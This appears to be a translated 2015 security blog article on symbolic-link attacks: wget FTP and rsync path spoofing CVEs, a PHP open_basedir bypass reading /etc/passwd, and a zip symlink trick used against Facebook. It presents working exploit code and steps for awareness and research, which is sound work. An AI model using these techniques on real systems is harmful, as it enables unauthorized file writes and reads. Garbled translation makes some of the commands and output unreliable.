Yaseng · 2015/01/27 10:01
00 0 x preface
Linux is the most widely used open source system, and its unique file system can be regarded as one of the core components supporting the powerful functions of Linux. In the file system, symbolic link can travel through time and space like a “moonlight box” and freely traverse strict path restrictions. This feature, To make it an important position in the entire Linux system, this paper will through practical analysis and research, in-depth discussion on the improper handling of symbolic links, may cause all kinds of security problems, in order to trigger attention to such problems.
0 x client 01
When the client recursively processes files, it can cause arbitrary file writing and code execution through symbolic link traversal.
Case study:
1. Wget ftp symbolic link attack (CVE-2014-4877)
When wget downloads FTP sites recursively, for example, wget -m ftp://127.0.0.1, forges the following data on the server
lrwxrwxrwx 1 root root 33 Oct 11 2013 fakedir -> /tmp
drwxrwxr-x 15 root root 4096 Oct 11 2013 fakedir
Copy the code
A local symbolic link named fakedir is set up, pointing to the/TMP directory. When wget sends CWD recursively to fakedir, it sends LIST. A malicious file can be forged or
Directories such as:
-rwx------ 1 root root 21 Aug 29 2013 pwned
Copy the code
When the pwned file is downloaded, the RETR command returns the file contents (binary or text). You can trick wget clients into writing to any directory.
Specific use script: https://github.com/yaseng/pentest/blob/master/exploit/wget-symlink_attack_exploit.py
Vulnerability demo:
Server(attacker) wget-symlink_attack_exploit.py
Client(victim) wget -m ftp://127.0.0.1
Copy the code
2:Rsync path spoofing attack vulnerability(CVE-2014-9512 )
After analyzing the VULNERABILITY of WGET, the author found that rsync can also use symbolic links to cheat the path when it recursively synchronizes files. Due to the complexity of rsync bidirectional file processing algorithm, it cannot directly forge file streams with strings. Rsync shared folder creates a symbolic link pointing to /root/.
[[email protected]Rsync]# ls -lh total 8.0k-rw-r --r-- 1 root root 2 Oct 31 03:16 1.txt LRWXRWXRWX 1 root root 6 Oct 31 05:09 fakedir -> /root/drwxr-xr-x 2 root root 4.0k Oct 31 05:08 truedirCopy the code
Write test files in Truedir
[[email protected] rsync]# cd truedir/
[[email protected] truedir]# ls
[[email protected] truedir]# echo rsync test > pwned
[[email protected]Truedir]# ls -lh total 4.0 k-rw-r --r-- 1 root root 11 Oct 31 05:17 pwned [[email protected] truedir]#
Copy the code
Then modify the server to send the file list code
#! c file: Rsync-3.1.1 /flist. C line:394 static void send_file_entry(int f, const char *fname, struct file_struct *file, #ifdef SUPPORT_LINKS const char *symlink_name, int symlink_len, #endif int ndx, int first_ndx) { if(strcmp(fname,"turedir/pwned") == 0){ fname="fakedir/pwned"; // symbolic link //change file true path(truedir) to symbolic link (fakedir) ) }Copy the code
Because the server has strict data verification, an error message “Received Request to transfer non-regular file fakedir/pwned. Test 7 [sender]” is displayed. As a result, client synchronization cannot be performed But for the attacker, the server side is controllable, find the corresponding code directly comment.
#! c /* if (iflags & ITEM_TRANSFER) { int i = ndx - cur_flist->ndx_start; if (i < 0 || ! S_ISREG(cur_flist->files[i]->mode)) { rprintf(FERROR, "received request to transfer non-regular file: %d [%s]\n", ndx, who_am_i()); exit_cleanup(RERR_PROTOCOL); }} * /Copy the code
Vulnerability demo:
client(victim):
0 x 02 web application
When accessing files through HTTP, improper handling of symbolic links by the Web server may cause security risks such as unauthorized access and file reading.
Case study:
PHP bypasses open_basedir to read arbitrary files
Use the symlink function to create a symbolic link to the target with mkdir as follows
#! php <? php mkdir("abc"); chdir("abc"); mkdir("etc"); chdir("etc"); mkdir("passwd"); chdir(".." ); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); chdir(".." ); chdir(".." ); chdir(".." ); chdir(".." ); symlink("abc/abc/abc/abc","tmplink"); symlink("tmplink/.. /.. /.. /etc/passwd", "exploit"); unlink("tmplink"); / / delete the mkdir (" tmplink "); ? >Copy the code
Generate the file
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/.. /.. /.. /etc/passwd - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php - -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplinkCopy the code
Exploits already point to /etc/passwd and can be accessed directly static through a Web server such as Apache, bypassing PHP open_basedir protection to read files.
2. Facebook local file read
When the server automatically decompresses zip,tar, and other compressed formats that support symbolic links. Server files can be read via symbolic links such as Facebook local file reads
1. Create a symbolic link file to /etc/passwd ln -s /etc/passwd link 2. Zip -- Symlinks test.zip link 3. Zip file is automatically decompressed. The /etc/passwd file is displayed on the 4Copy the code
As shown in figure
0×03 Reference links
1:CVE-2014-4877 Wget FTP download folder link spoofing vulnerability http://xteam.baidu.com/?p=30
2:Rsync path spoofing attack vulnerability http://xteam.baidu.com/?p=169
3:Php open_basedir bypass http://cxsecurity.com/issue/WLB-2009110068
4:Reading local files from Facebook’s server http://josipfranjkovic.blogspot.com/2014/12/reading-local-files-from-facebooks.html